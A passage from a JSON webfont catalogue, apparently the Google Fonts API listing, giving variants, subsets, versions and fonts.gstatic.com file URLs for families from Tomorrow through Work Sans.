        "100": "http://fonts.gstatic.com/s/tomorrow/v3/WBLgrETNbFtZCeGqgR2xe2XiKMiokE4.ttf",
        "100italic": "http://fonts.gstatic.com/s/tomorrow/v3/WBLirETNbFtZCeGqgRXXQwHoLOqtgE5h0A.ttf",
        "200": "http://fonts.gstatic.com/s/tomorrow/v3/WBLhrETNbFtZCeGqgR0dWkXIBsShiVd4.ttf",
        "200italic": "http://fonts.gstatic.com/s/tomorrow/v3/WBLjrETNbFtZCeGqgRXXQ63JDMCDjEd4yVY.ttf",
        "300": "http://fonts.gstatic.com/s/tomorrow/v3/WBLhrETNbFtZCeGqgR15WUXIBsShiVd4.ttf",
        "300italic": "http://fonts.gstatic.com/s/tomorrow/v3/WBLjrETNbFtZCeGqgRXXQ8nKDMCDjEd4yVY.ttf",
        "regular": "http://fonts.gstatic.com/s/tomorrow/v3/WBLmrETNbFtZCeGqgSXVcWHALdio.ttf",
        "italic": "http://fonts.gstatic.com/s/tomorrow/v3/WBLgrETNbFtZCeGqgRXXe2XiKMiokE4.ttf",
        "500": "http://fonts.gstatic.com/s/tomorrow/v3/WBLhrETNbFtZCeGqgR0hWEXIBsShiVd4.ttf",
        "500italic": "http://fonts.gstatic.com/s/tomorrow/v3/WBLjrETNbFtZCeGqgRXXQ5HLDMCDjEd4yVY.ttf",
        "600": "http://fonts.gstatic.com/s/tomorrow/v3/WBLhrETNbFtZCeGqgR0NX0XIBsShiVd4.ttf",
        "600italic": "http://fonts.gstatic.com/s/tomorrow/v3/WBLjrETNbFtZCeGqgRXXQ73MDMCDjEd4yVY.ttf",
        "700": "http://fonts.gstatic.com/s/tomorrow/v3/WBLhrETNbFtZCeGqgR1pXkXIBsShiVd4.ttf",
        "700italic": "http://fonts.gstatic.com/s/tomorrow/v3/WBLjrETNbFtZCeGqgRXXQ9nNDMCDjEd4yVY.ttf",
        "800": "http://fonts.gstatic.com/s/tomorrow/v3/WBLhrETNbFtZCeGqgR11XUXIBsShiVd4.ttf",
        "800italic": "http://fonts.gstatic.com/s/tomorrow/v3/WBLjrETNbFtZCeGqgRXXQ8XODMCDjEd4yVY.ttf",
        "900": "http://fonts.gstatic.com/s/tomorrow/v3/WBLhrETNbFtZCeGqgR1RXEXIBsShiVd4.ttf",
        "900italic": "http://fonts.gstatic.com/s/tomorrow/v3/WBLjrETNbFtZCeGqgRXXQ-HPDMCDjEd4yVY.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Trade Winds",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v10",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/tradewinds/v10/AYCPpXPpYNIIT7h8-QenM3Jq7PKP5Z_G.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Trirong",
      "variants": [
        "100",
        "100italic",
        "200",
        "200italic",
        "300",
        "300italic",
        "regular",
        "italic",
        "500",
        "500italic",
        "600",
        "600italic",
        "700",
        "700italic",
        "800",
        "800italic",
        "900",
        "900italic"
      ],
      "subsets": [
        "latin",
        "latin-ext",
        "thai",
        "vietnamese"
      ],
      "version": "v6",
      "lastModified": "2020-09-02",
      "files": {
        "100": "http://fonts.gstatic.com/s/trirong/v6/7r3EqXNgp8wxdOdOl-go3YRl6ujngw.ttf",
        "100italic": "http://fonts.gstatic.com/s/trirong/v6/7r3CqXNgp8wxdOdOn44QuY5hyO33g8IY.ttf",
        "200": "http://fonts.gstatic.com/s/trirong/v6/7r3DqXNgp8wxdOdOl0QJ_a5L5uH-mts.ttf",
        "200italic": "http://fonts.gstatic.com/s/trirong/v6/7r3BqXNgp8wxdOdOn44QFa9B4sP7itsB5g.ttf",
        "300": "http://fonts.gstatic.com/s/trirong/v6/7r3DqXNgp8wxdOdOlyAK_a5L5uH-mts.ttf",
        "300italic": "http://fonts.gstatic.com/s/trirong/v6/7r3BqXNgp8wxdOdOn44QcaxB4sP7itsB5g.ttf",
        "regular": "http://fonts.gstatic.com/s/trirong/v6/7r3GqXNgp8wxdOdOr4wi2aZg-ug.ttf",
        "italic": "http://fonts.gstatic.com/s/trirong/v6/7r3EqXNgp8wxdOdOn44o3YRl6ujngw.ttf",
        "500": "http://fonts.gstatic.com/s/trirong/v6/7r3DqXNgp8wxdOdOl3gL_a5L5uH-mts.ttf",
        "500italic": "http://fonts.gstatic.com/s/trirong/v6/7r3BqXNgp8wxdOdOn44QKa1B4sP7itsB5g.ttf",
        "600": "http://fonts.gstatic.com/s/trirong/v6/7r3DqXNgp8wxdOdOl1QM_a5L5uH-mts.ttf",
        "600italic": "http://fonts.gstatic.com/s/trirong/v6/7r3BqXNgp8wxdOdOn44QBapB4sP7itsB5g.ttf",
        "700": "http://fonts.gstatic.com/s/trirong/v6/7r3DqXNgp8wxdOdOlzAN_a5L5uH-mts.ttf",
        "700italic": "http://fonts.gstatic.com/s/trirong/v6/7r3BqXNgp8wxdOdOn44QYatB4sP7itsB5g.ttf",
        "800": "http://fonts.gstatic.com/s/trirong/v6/7r3DqXNgp8wxdOdOlywO_a5L5uH-mts.ttf",
        "800italic": "http://fonts.gstatic.com/s/trirong/v6/7r3BqXNgp8wxdOdOn44QfahB4sP7itsB5g.ttf",
        "900": "http://fonts.gstatic.com/s/trirong/v6/7r3DqXNgp8wxdOdOlwgP_a5L5uH-mts.ttf",
        "900italic": "http://fonts.gstatic.com/s/trirong/v6/7r3BqXNgp8wxdOdOn44QWalB4sP7itsB5g.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Trispace",
      "variants": [
        "100",
        "200",
        "300",
        "regular",
        "500",
        "600",
        "700",
        "800"
      ],
      "subsets": [
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v1",
      "lastModified": "2020-10-22",
      "files": {
        "100": "http://fonts.gstatic.com/s/trispace/v1/Yq65-LKSQC3o56LxxgRrtA6yBqsrXL5GI5KI-IUZVGsxWFIlbH9qoQl0zHugpt0.ttf",
        "200": "http://fonts.gstatic.com/s/trispace/v1/Yq65-LKSQC3o56LxxgRrtA6yBqsrXL5GI5KI-IUZVGsxWFIlbP9roQl0zHugpt0.ttf",
        "300": "http://fonts.gstatic.com/s/trispace/v1/Yq65-LKSQC3o56LxxgRrtA6yBqsrXL5GI5KI-IUZVGsxWFIlbCFroQl0zHugpt0.ttf",
        "regular": "http://fonts.gstatic.com/s/trispace/v1/Yq65-LKSQC3o56LxxgRrtA6yBqsrXL5GI5KI-IUZVGsxWFIlbH9roQl0zHugpt0.ttf",
        "500": "http://fonts.gstatic.com/s/trispace/v1/Yq65-LKSQC3o56LxxgRrtA6yBqsrXL5GI5KI-IUZVGsxWFIlbE1roQl0zHugpt0.ttf",
        "600": "http://fonts.gstatic.com/s/trispace/v1/Yq65-LKSQC3o56LxxgRrtA6yBqsrXL5GI5KI-IUZVGsxWFIlbKFsoQl0zHugpt0.ttf",
        "700": "http://fonts.gstatic.com/s/trispace/v1/Yq65-LKSQC3o56LxxgRrtA6yBqsrXL5GI5KI-IUZVGsxWFIlbJhsoQl0zHugpt0.ttf",
        "800": "http://fonts.gstatic.com/s/trispace/v1/Yq65-LKSQC3o56LxxgRrtA6yBqsrXL5GI5KI-IUZVGsxWFIlbP9soQl0zHugpt0.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Trocchi",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v9",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/trocchi/v9/qWcqB6WkuIDxDZLcDrtUvMeTYD0.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Trochut",
      "variants": [
        "regular",
        "italic",
        "700"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v8",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/trochut/v8/CHyjV-fDDlP9bDIw5nSIfVIPLns.ttf",
        "italic": "http://fonts.gstatic.com/s/trochut/v8/CHyhV-fDDlP9bDIw1naCeXAKPns8jw.ttf",
        "700": "http://fonts.gstatic.com/s/trochut/v8/CHymV-fDDlP9bDIw3sinWVokMnIllmA.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Trykker",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v9",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/trykker/v9/KtktALyWZJXudUPzhNnoOd2j22U.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Tulpen One",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v10",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/tulpenone/v10/dFa6ZfeC474skLgesc0CWj0w_HyIRlE.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Turret Road",
      "variants": [
        "200",
        "300",
        "regular",
        "500",
        "700",
        "800"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v2",
      "lastModified": "2020-07-23",
      "files": {
        "200": "http://fonts.gstatic.com/s/turretroad/v2/pxidypMgpcBFjE84Zv-fE0ONEdeLYk1Mq3ap.ttf",
        "300": "http://fonts.gstatic.com/s/turretroad/v2/pxidypMgpcBFjE84Zv-fE0PpEteLYk1Mq3ap.ttf",
        "regular": "http://fonts.gstatic.com/s/turretroad/v2/pxiAypMgpcBFjE84Zv-fE3tFOvODSVFF.ttf",
        "500": "http://fonts.gstatic.com/s/turretroad/v2/pxidypMgpcBFjE84Zv-fE0OxE9eLYk1Mq3ap.ttf",
        "700": "http://fonts.gstatic.com/s/turretroad/v2/pxidypMgpcBFjE84Zv-fE0P5FdeLYk1Mq3ap.ttf",
        "800": "http://fonts.gstatic.com/s/turretroad/v2/pxidypMgpcBFjE84Zv-fE0PlFteLYk1Mq3ap.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Ubuntu",
      "variants": [
        "300",
        "300italic",
        "regular",
        "italic",
        "500",
        "500italic",
        "700",
        "700italic"
      ],
      "subsets": [
        "cyrillic",
        "cyrillic-ext",
        "greek",
        "greek-ext",
        "latin",
        "latin-ext"
      ],
      "version": "v15",
      "lastModified": "2020-09-10",
      "files": {
        "300": "http://fonts.gstatic.com/s/ubuntu/v15/4iCv6KVjbNBYlgoC1CzTt2aMH4V_gg.ttf",
        "300italic": "http://fonts.gstatic.com/s/ubuntu/v15/4iCp6KVjbNBYlgoKejZftWyIPYBvgpUI.ttf",
        "regular": "http://fonts.gstatic.com/s/ubuntu/v15/4iCs6KVjbNBYlgo6eAT3v02QFg.ttf",
        "italic": "http://fonts.gstatic.com/s/ubuntu/v15/4iCu6KVjbNBYlgoKeg7znUiAFpxm.ttf",
        "500": "http://fonts.gstatic.com/s/ubuntu/v15/4iCv6KVjbNBYlgoCjC3Tt2aMH4V_gg.ttf",
        "500italic": "http://fonts.gstatic.com/s/ubuntu/v15/4iCp6KVjbNBYlgoKejYHtGyIPYBvgpUI.ttf",
        "700": "http://fonts.gstatic.com/s/ubuntu/v15/4iCv6KVjbNBYlgoCxCvTt2aMH4V_gg.ttf",
        "700italic": "http://fonts.gstatic.com/s/ubuntu/v15/4iCp6KVjbNBYlgoKejZPsmyIPYBvgpUI.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Ubuntu Condensed",
      "variants": [
        "regular"
      ],
      "subsets": [
        "cyrillic",
        "cyrillic-ext",
        "greek",
        "greek-ext",
        "latin",
        "latin-ext"
      ],
      "version": "v11",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/ubuntucondensed/v11/u-4k0rCzjgs5J7oXnJcM_0kACGMtf-fVqvHoJXw.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Ubuntu Mono",
      "variants": [
        "regular",
        "italic",
        "700",
        "700italic"
      ],
      "subsets": [
        "cyrillic",
        "cyrillic-ext",
        "greek",
        "greek-ext",
        "latin",
        "latin-ext"
      ],
      "version": "v10",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/ubuntumono/v10/KFOjCneDtsqEr0keqCMhbBc9AMX6lJBP.ttf",
        "italic": "http://fonts.gstatic.com/s/ubuntumono/v10/KFOhCneDtsqEr0keqCMhbCc_CsHYkYBPY3o.ttf",
        "700": "http://fonts.gstatic.com/s/ubuntumono/v10/KFO-CneDtsqEr0keqCMhbC-BL-Hyv4xGemO1.ttf",
        "700italic": "http://fonts.gstatic.com/s/ubuntumono/v10/KFO8CneDtsqEr0keqCMhbCc_Mn33tYhkf3O1GVg.ttf"
      },
      "category": "monospace",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Ultra",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v13",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/ultra/v13/zOLy4prXmrtY-tT6yLOD6NxF.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Uncial Antiqua",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v8",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/uncialantiqua/v8/N0bM2S5WOex4OUbESzoESK-i-PfRS5VBBSSF.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Underdog",
      "variants": [
        "regular"
      ],
      "subsets": [
        "cyrillic",
        "latin",
        "latin-ext"
      ],
      "version": "v9",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/underdog/v9/CHygV-jCElj7diMroVSiU14GN2Il.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Unica One",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v8",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/unicaone/v8/DPEuYwWHyAYGVTSmalshdtffuEY7FA.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "UnifrakturCook",
      "variants": [
        "700"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v12",
      "lastModified": "2020-07-23",
      "files": {
        "700": "http://fonts.gstatic.com/s/unifrakturcook/v12/IurA6Yli8YOdcoky-0PTTdkm56n05Uw13ILXs-h6.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "UnifrakturMaguntia",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v11",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/unifrakturmaguntia/v11/WWXPlieVYwiGNomYU-ciRLRvEmK7oaVun2xNNgNa1A.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Unkempt",
      "variants": [
        "regular",
        "700"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v12",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/unkempt/v12/2EbnL-Z2DFZue0DSSYYf8z2Yt_c.ttf",
        "700": "http://fonts.gstatic.com/s/unkempt/v12/2EbiL-Z2DFZue0DScTow1zWzq_5uT84.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Unlock",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v10",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/unlock/v10/7Au-p_8ykD-cDl7GKAjSwkUVOQ.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Unna",
      "variants": [
        "regular",
        "italic",
        "700",
        "700italic"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v15",
      "lastModified": "2020-09-25",
      "files": {
        "regular": "http://fonts.gstatic.com/s/unna/v15/AYCEpXzofN0NCpgBlGHCWFM.ttf",
        "italic": "http://fonts.gstatic.com/s/unna/v15/AYCKpXzofN0NOpoLkEPHSFNyxw.ttf",
        "700": "http://fonts.gstatic.com/s/unna/v15/AYCLpXzofN0NMiQusGnpRFpr3vc.ttf",
        "700italic": "http://fonts.gstatic.com/s/unna/v15/AYCJpXzofN0NOpozLGzjQHhuzvef5Q.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "VT323",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v12",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/vt323/v12/pxiKyp0ihIEF2hsYHpT2dkNE.ttf"
      },
      "category": "monospace",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Vampiro One",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v11",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/vampiroone/v11/gokqH6DoDl5yXvJytFsdLkqnsvhIor3K.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Varela",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v11",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/varela/v11/DPEtYwqExx0AWHXJBBQFfvzDsQ.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Varela Round",
      "variants": [
        "regular"
      ],
      "subsets": [
        "hebrew",
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v13",
      "lastModified": "2020-09-10",
      "files": {
        "regular": "http://fonts.gstatic.com/s/varelaround/v13/w8gdH283Tvk__Lua32TysjIvoMGOD9gxZw.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Varta",
      "variants": [
        "300",
        "regular",
        "500",
        "600",
        "700"
      ],
      "subsets": [
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v1",
      "lastModified": "2020-07-13",
      "files": {
        "300": "http://fonts.gstatic.com/s/varta/v1/Qw3AZQpJHj_6LzHUngWbrFkDH1x96j4EirE-9PGLfQ.ttf",
        "regular": "http://fonts.gstatic.com/s/varta/v1/Qw3AZQpJHj_6LzHUngWbrFkDH1x9tD4EirE-9PGLfQ.ttf",
        "500": "http://fonts.gstatic.com/s/varta/v1/Qw3AZQpJHj_6LzHUngWbrFkDH1x9hj4EirE-9PGLfQ.ttf",
        "600": "http://fonts.gstatic.com/s/varta/v1/Qw3AZQpJHj_6LzHUngWbrFkDH1x9ajkEirE-9PGLfQ.ttf",
        "700": "http://fonts.gstatic.com/s/varta/v1/Qw3AZQpJHj_6LzHUngWbrFkDH1x9UzkEirE-9PGLfQ.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Vast Shadow",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v10",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/vastshadow/v10/pe0qMImKOZ1V62ZwbVY9dfe6Kdpickwp.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Vesper Libre",
      "variants": [
        "regular",
        "500",
        "700",
        "900"
      ],
      "subsets": [
        "devanagari",
        "latin",
        "latin-ext"
      ],
      "version": "v13",
      "lastModified": "2020-09-25",
      "files": {
        "regular": "http://fonts.gstatic.com/s/vesperlibre/v13/bx6CNxyWnf-uxPdXDHUD_Rd4D0-N2qIWVQ.ttf",
        "500": "http://fonts.gstatic.com/s/vesperlibre/v13/bx6dNxyWnf-uxPdXDHUD_RdA-2ap0okKXKvPlw.ttf",
        "700": "http://fonts.gstatic.com/s/vesperlibre/v13/bx6dNxyWnf-uxPdXDHUD_RdAs2Cp0okKXKvPlw.ttf",
        "900": "http://fonts.gstatic.com/s/vesperlibre/v13/bx6dNxyWnf-uxPdXDHUD_RdAi2Kp0okKXKvPlw.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Viaoda Libre",
      "variants": [
        "regular"
      ],
      "subsets": [
        "cyrillic",
        "cyrillic-ext",
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v3",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/viaodalibre/v3/vEFW2_lWCgoR6OKuRz9kcRVJb2IY2tOHXg.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Vibes",
      "variants": [
        "regular"
      ],
      "subsets": [
        "arabic",
        "latin"
      ],
      "version": "v3",
      "lastModified": "2020-08-24",
      "files": {
        "regular": "http://fonts.gstatic.com/s/vibes/v3/QdVYSTsmIB6tmbd3HpbsuBlh.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Vibur",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v11",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/vibur/v11/DPEiYwmEzw0QRjTpLjoJd-Xa.ttf"
      },
      "category": "handwriting",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Vidaloka",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v13",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/vidaloka/v13/7cHrv4c3ipenMKlEass8yn4hnCci.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Viga",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v9",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/viga/v9/xMQbuFFdSaiX_QIjD4e2OX8.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Voces",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v10",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/voces/v10/-F6_fjJyLyU8d4PBBG7YpzlJ.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Volkhov",
      "variants": [
        "regular",
        "italic",
        "700",
        "700italic"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v12",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/volkhov/v12/SlGQmQieoJcKemNeQTIOhHxzcD0.ttf",
        "italic": "http://fonts.gstatic.com/s/volkhov/v12/SlGSmQieoJcKemNecTAEgF52YD0NYw.ttf",
        "700": "http://fonts.gstatic.com/s/volkhov/v12/SlGVmQieoJcKemNeeY4hoHRYbDQUego.ttf",
        "700italic": "http://fonts.gstatic.com/s/volkhov/v12/SlGXmQieoJcKemNecTA8PHFSaBYRagrQrA.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Vollkorn",
      "variants": [
        "regular",
        "500",
        "600",
        "700",
        "800",
        "900",
        "italic",
        "500italic",
        "600italic",
        "700italic",
        "800italic",
        "900italic"
      ],
      "subsets": [
        "cyrillic",
        "cyrillic-ext",
        "greek",
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v12",
      "lastModified": "2020-06-26",
      "files": {
        "regular": "http://fonts.gstatic.com/s/vollkorn/v12/0ybgGDoxxrvAnPhYGzMlQLzuMasz6Df2MHGuGWOdEbD63w.ttf",
        "500": "http://fonts.gstatic.com/s/vollkorn/v12/0ybgGDoxxrvAnPhYGzMlQLzuMasz6Df2AnGuGWOdEbD63w.ttf",
        "600": "http://fonts.gstatic.com/s/vollkorn/v12/0ybgGDoxxrvAnPhYGzMlQLzuMasz6Df27nauGWOdEbD63w.ttf",
        "700": "http://fonts.gstatic.com/s/vollkorn/v12/0ybgGDoxxrvAnPhYGzMlQLzuMasz6Df213auGWOdEbD63w.ttf",
        "800": "http://fonts.gstatic.com/s/vollkorn/v12/0ybgGDoxxrvAnPhYGzMlQLzuMasz6Df2sHauGWOdEbD63w.ttf",
        "900": "http://fonts.gstatic.com/s/vollkorn/v12/0ybgGDoxxrvAnPhYGzMlQLzuMasz6Df2mXauGWOdEbD63w.ttf",
        "italic": "http://fonts.gstatic.com/s/vollkorn/v12/0ybuGDoxxrvAnPhYGxksckM2WMCpRjDj-DJGWmmZM7Xq34g9.ttf",
        "500italic": "http://fonts.gstatic.com/s/vollkorn/v12/0ybuGDoxxrvAnPhYGxksckM2WMCpRjDj-DJ0WmmZM7Xq34g9.ttf",
        "600italic": "http://fonts.gstatic.com/s/vollkorn/v12/0ybuGDoxxrvAnPhYGxksckM2WMCpRjDj-DKYXWmZM7Xq34g9.ttf",
        "700italic": "http://fonts.gstatic.com/s/vollkorn/v12/0ybuGDoxxrvAnPhYGxksckM2WMCpRjDj-DKhXWmZM7Xq34g9.ttf",
        "800italic": "http://fonts.gstatic.com/s/vollkorn/v12/0ybuGDoxxrvAnPhYGxksckM2WMCpRjDj-DLGXWmZM7Xq34g9.ttf",
        "900italic": "http://fonts.gstatic.com/s/vollkorn/v12/0ybuGDoxxrvAnPhYGxksckM2WMCpRjDj-DLvXWmZM7Xq34g9.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Vollkorn SC",
      "variants": [
        "regular",
        "600",
        "700",
        "900"
      ],
      "subsets": [
        "cyrillic",
        "cyrillic-ext",
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v4",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/vollkornsc/v4/j8_v6-zQ3rXpceZj9cqnVhF5NH-iSq_E.ttf",
        "600": "http://fonts.gstatic.com/s/vollkornsc/v4/j8_y6-zQ3rXpceZj9cqnVimhGluqYbPN5Yjn.ttf",
        "700": "http://fonts.gstatic.com/s/vollkornsc/v4/j8_y6-zQ3rXpceZj9cqnVinFG1uqYbPN5Yjn.ttf",
        "900": "http://fonts.gstatic.com/s/vollkornsc/v4/j8_y6-zQ3rXpceZj9cqnVin9GVuqYbPN5Yjn.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Voltaire",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v10",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/voltaire/v10/1Pttg8PcRfSblAvGvQooYKVnBOif.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Waiting for the Sunrise",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v11",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/waitingforthesunrise/v11/WBL1rFvOYl9CEv2i1mO6KUW8RKWJ2zoXoz5JsYZQ9h_ZYk5J.ttf"
      },
      "category": "handwriting",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Wallpoet",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v12",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/wallpoet/v12/f0X10em2_8RnXVVdUNbu7cXP8L8G.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Walter Turncoat",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v11",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/walterturncoat/v11/snfys0Gs98ln43n0d-14ULoToe67YB2dQ5ZPqQ.ttf"
      },
      "category": "handwriting",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Warnes",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v10",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/warnes/v10/pONn1hc0GsW6sW5OpiC2o6Lkqg.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Wellfleet",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v8",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/wellfleet/v8/nuF7D_LfQJb3VYgX6eyT42aLDhO2HA.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Wendy One",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v9",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/wendyone/v9/2sDcZGJOipXfgfXV5wgDb2-4C7wFZQ.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Wire One",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v11",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/wireone/v11/qFdH35Wah5htUhV75WGiWdrCwwcJ.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Work Sans",
      "variants": [
        "100",
        "200",
        "300",
        "regular",
        "500",
        "600",
        "700",
